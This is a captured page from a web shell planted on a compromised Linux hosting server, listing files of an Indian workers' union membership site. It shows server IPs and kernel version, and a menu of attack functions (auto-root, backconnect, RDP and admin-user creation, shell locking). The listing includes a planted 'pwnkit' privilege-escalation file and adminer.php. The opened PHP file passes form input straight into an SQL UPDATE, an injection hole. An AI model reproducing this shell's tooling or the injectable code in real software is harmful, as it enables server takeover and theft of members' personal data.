Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.216.77
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
tjra.in /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
admin-jurep
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
htfile
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
qr-code
[ DIR ]
drwxr-xr-x
qrfile
[ DIR ]
drwxr-xr-x
state-committee
[ DIR ]
drwxr-xr-x
telangana--state-unit
[ DIR ]
drwxr-xr-x
.htaccess
281
B
-rw-r--r--
about-us.php
3.35
KB
-rw-r--r--
achievements.php
2.53
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
become-a-member.php
8.62
KB
-rw-r--r--
blog-detail.php
10.05
KB
-rw-r--r--
blog.php
8.35
KB
-rw-r--r--
blog_enquiry.php
2.04
KB
-rw-r--r--
contact-us.php
9.69
KB
-rw-r--r--
delete_member.php
269
B
-rw-r--r--
direct-bank-account.php
7.01
KB
-rw-r--r--
edit-profile.php
20.74
KB
-rw-r--r--
faq.php
11.39
KB
-rw-r--r--
forgot-password.php
7
KB
-rw-r--r--
gallery-detail.php
3.84
KB
-rw-r--r--
google559cbc7861e1a83d.html
53
B
-rw-r--r--
index.php
12.45
KB
-rw-r--r--
login.php
6.37
KB
-rw-r--r--
logout.php
155
B
-rw-r--r--
mahila-women.php
3.51
KB
-rw-r--r--
member-details.php
3.82
KB
-rw-r--r--
membership.php
8.38
KB
-rw-r--r--
my-booking.php
8.49
KB
-rw-r--r--
my-certificate.php
16.27
KB
-rw-r--r--
my-idcard - Copy.php
22.1
KB
-rw-r--r--
my-idcard.php
23.34
KB
-rw-r--r--
my-idcard2.php
9.07
KB
-rw-r--r--
my-idcard3.php
8.27
KB
-rw-r--r--
my-profile.php
10.98
KB
-rw-r--r--
nris-welfare-and-support.php
6.01
KB
-rw-r--r--
offline-payment.php
5.24
KB
-rw-r--r--
payment.php
6.02
KB
-rw-r--r--
photo-gallery.php
5.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
reg_validation.php
1.19
KB
-rw-r--r--
register.php
21.81
KB
-rw-r--r--
registration-charge.php
4.15
KB
-rw-r--r--
robots.txt
66
B
-rw-r--r--
service-details.php
3.4
KB
-rw-r--r--
tjra-objective.php
2.78
KB
-rw-r--r--
video-gallery.php
2.61
KB
-rw-r--r--
video.php
2.61
KB
-rw-r--r--
view-member-details.php
4.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : member-details.php
<?php include("includes/css.php"); if(isset($_POST['update'])) { extract($_POST); date_default_timezone_set('Asia/Kolkata'); $date = date('Y-m-d H:i:s'); $product=$_POST["payment_status"]; $id=$_POST["a_id"]; $sql1 ="UPDATE user_profile SET payment_status='$product' WHERE id='$id'"; $res_sql=mysqli_query($conn,$sql1) or die(mysqli_error($conn)); if($res_sql) { } } ?> <body class="hold-transition skin-blue sidebar-mini"> <div class="wrapper"> <?php include("includes/header.php")?> <?php include("includes/sidebar.php")?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-12"> <div class="box box-primary"> <div class="box-header with-border"> <div class="col-md-12"> <h3 class="box-title">Hammal & Transfort Workers Union Details :</h3> </div> </div> <!-- /.box-header --> <div class="box-body"> <div class="table-responsive mt-20"> <table class="table table-bordered table-striped example3"> <thead> <tr> <th>S. No</th> <th>Name</th> <th>Contact No.</th> <th>Date Of Birth</th> <th>Designation</th> <th>Organizations</th> <th>Image</th> <th>Signature</th> <th>Created Date</th> <th>View</th> <th>Status</th> <th>Delete</th> </tr> </thead> <tbody> <?php $orgz="TS Hammal & Transport Workers Union"; $sql1=mysqli_query($conn, "select * from user_profile where organizations='".$orgz."'"); $j=1; while($res=mysqli_fetch_array($sql1)){ ?> <tr> <td><?php echo $j; $j++; ?></td> <td><?php echo $res['name']; ?></td> <td><?php echo $res['contact_no']; ?></td> <td><?php echo $res['dob']; ?></td> <td><?php echo $res['designation']; ?></td> <td><?php echo $res['organizations']; ?></td> <td><img src="images/<?php echo $res['image']; ?>" style="width:80px;"></td> <td><img src="images/<?php echo $res['signature']; ?>" style="width:80px;"></td> <td> <form method="post" action=""> <select class="form-control" name="payment_status"> <option value="<?php echo $res['payment_status']; ?>"><?php echo $res['payment_status']; ?></option> <option value="Accept">Accept</option> <option value="Processing">Processing</option> <option value="Delivered">Delivered</option> <option value="Reject">Reject</option> </select> <input type="hidden" name="a_id" value="<?php echo $res['id']; ?>" class="form-control-sm"> <button type="submit" name="update" class="btn btn-success" >Update</button> </form> </td> <td><?php echo $res['created_date']; ?></td> <td><a href="view-member-details.php?id=<?= $res['id']; ?>"><i class="fa fa-eye"></i></a></td> <td><a href="javascript:delete_con_ID('<?php echo $res['id'] ?>');" class="ask"><i class="fa fa-trash-o"></i></a></td> </tr> <?php } ?> </tbody> </table> </div> <!-- /.box-body --> </div> </div> </div> </div> </section> </div> <?php include("includes/footer.php")?> </div> <?php include("includes/js.php")?> </body> <script type="text/javascript"> function delete_con_ID(id) { if (confirm('Do You Want to Deleting This \nContinue anyway?')) { window.location.href = 'delete_member.php?id=' + id; } } </script> </html>
Close